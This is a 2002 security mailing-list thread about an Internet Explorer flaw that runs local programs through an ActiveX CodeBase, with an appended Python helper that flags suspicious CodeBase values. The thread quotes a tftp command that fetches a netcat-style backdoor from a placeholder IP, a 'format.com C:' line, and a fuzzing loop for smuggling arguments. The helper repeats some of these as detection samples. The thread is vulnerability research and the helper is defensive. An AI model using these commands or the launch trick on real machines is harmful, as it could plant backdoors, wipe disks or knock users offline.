RE: Rather large MSIE-hole

From: Ryan Sweat (h3xm3@swbell.net)
Date: 03/14/02


From: "Ryan Sweat" <h3xm3@swbell.net>
To: "'Slow2Show'" <sl2sho@yahoo.com>, <vuln-dev@securityfocus.com>
Date: Thu, 14 Mar 2002 12:36:45 -0600

The parameter you insert, ie: 'c:/winnt/system32/calc.exe', is
transformed into an ActiveX control in C:\WINDOWS\Downloaded Program
Files. If you view the properties of the control file it creates, you
will notice that the parameter is listed as the "CodeBase". In this
example it would be file://c:\windows\system32\calc.exe. I don't
believe it is possible to supply an argument here as it will only accept
a complete path and filename with no white spaces.

The ideal exploit would be the ability to inject code onto the user's
computer and have it run without supplying arguments. Georgi Guninski
has described methods of accomplishing this, however it involves
Temporary Internet Files and the path to that directory will change
depending on which user is logged in.

http://www.guninski.com/parsedat-desc.html

-ryan

-----Original Message-----
From: Slow2Show [mailto:sl2sho@yahoo.com]
Sent: Thursday, March 14, 2002 3:30 AM
To: vuln-dev@securityfocus.com
Subject: Re: Rather large MSIE-hole

In-Reply-To: <20020313125115.A14918@castleblack.darkflame.net>

>I haven't tried, since I don't run MS, how about?
>var programName=new Array(
>'c:/winnt/system32/tftp.exe -i xxx.xxx.xxx.xxx GET ncx99.exe',
>'c:/winnt/system32/ncx99.exe');

I tried your idea, nocon... it seems that the codebase
will not let you pass any parameters...
so 'C:/WINDOWS/system32/calc.exe' will work,
but 'c:/winnt/system32/tftp.exe -i xxx.xxx.xxx.xxx GET ncx99.exe'
will not because of the parameters.

I've researched getting this to work by using Unicode
chars to see if there was something that you could
put in to bypass this... but alas it won't work. Note that
spaces are allowed in the directory path, but not after
the program name.

so this would work:
'C:/Program Files/intern~1/IEXPLORER.exe'

but these won't:
'C:/Program Files/intern~1/IEXPLORER.exe -k'
'C:/WINDOWS/system32/format.com C:'

// pseudo code... showing the concept of how I tried
// every Unicode char as a separator between the program name and the argument
for (var i = 0; i < 65535; i++) {
    var c = String.fromCharCode(i);   // the candidate character
    programName = 'C:/Program Files/intern~/IEXPLORER.exe' + c + '-k';
}

The only possible attack vector I can see from this is
if you had prior knowledge of the path of a program
on a system that you wanted to execute. This is
slightly dangerous if you are running as admin,
because the telnet server could be started by
launching
%SYSTEMROOT%\system32\tlntsess.exe
But you would still need a valid user/pass to gain
access. (And you should be slapped if you are web
browsing as admin.)

I'm glad this hole turned out to be relatively benign...
this would have turned into a really dangerous hole
and not just an annoying one if parameters could be
passed.

But don't forget that script kiddies could "boot" you
by executing logoff.exe/tsshutdn.exe/tsdiscon.exe/

if anybody else finds a way of getting the parameters
to work....please post to the list.

lata,

-Slow2Show-
University of Florida

p.s. see ya @ SANS2002...party Florida style!!
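An added audit helper, not part of this thread or of any poster's code: it takes CodeBase values of the kind Ryan describes (the control dropped into Downloaded Program Files lists the injected parameter as its CodeBase) and labels the ones that point at a local executable, keeping the thread's observation that spaces inside the directory path are legitimate while text after the program name is an attempted argument. The sample values and the file extension list are constructed for illustration; a real audit would read the CodeBase from each control's properties.

```python
import re
from urllib.parse import unquote

# Constructed sample CodeBase values in the shape the thread describes,
# e.g. file://c:\windows\system32\calc.exe. None come from a real system.
SAMPLE_CODEBASES = [
    "http://example.invalid/controls/viewer.cab",
    "file://c:\\windows\\system32\\calc.exe",
    "file://C:/Program Files/intern~1/IEXPLORER.exe",
    "file://c:/winnt/system32/tftp.exe -i 203.0.113.5 GET ncx99.exe",
    "file://C:/WINDOWS/system32/format.com C:",
    "file:///c:/temp/readme.txt",
]

# Program name up to the first executable extension; anything after whitespace
# is treated as an argument. A directory name containing ".exe " would be a
# false positive, which is acceptable for an audit that errs towards review.
EXECUTABLE = re.compile(r"^(?P<prog>.*?\.(exe|com|bat|cmd|scr|pif))(?P<args>\s.+)?$",
                        re.IGNORECASE)


def codebase_to_local_path(codebase):
    """Return a backslash path if the CodeBase is a file: URL, else None."""
    cb = codebase.strip()
    if not cb.lower().startswith("file:"):
        return None
    # Accept file://c:/..., file:///c:/... and raw backslash forms alike.
    rest = unquote(cb[5:]).lstrip("/")
    return rest.replace("/", "\\")


def classify_codebase(codebase):
    """Label one CodeBase value for an audit of Downloaded Program Files."""
    path = codebase_to_local_path(codebase)
    if path is None:
        return "remote"          # ordinary: control fetched from a web server
    m = EXECUTABLE.match(path)
    if not m:
        return "local-file"      # local but not a program: still worth a look
    # Spaces inside the directory path are fine; only text after the
    # program name counts as an argument attempt.
    return "local-executable-with-args" if m.group("args") else "local-executable"


def audit_codebases(codebases):
    """Return only the entries a defender should investigate, with their label."""
    return [(cb, classify_codebase(cb)) for cb in codebases
            if classify_codebase(cb) != "remote"]
```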
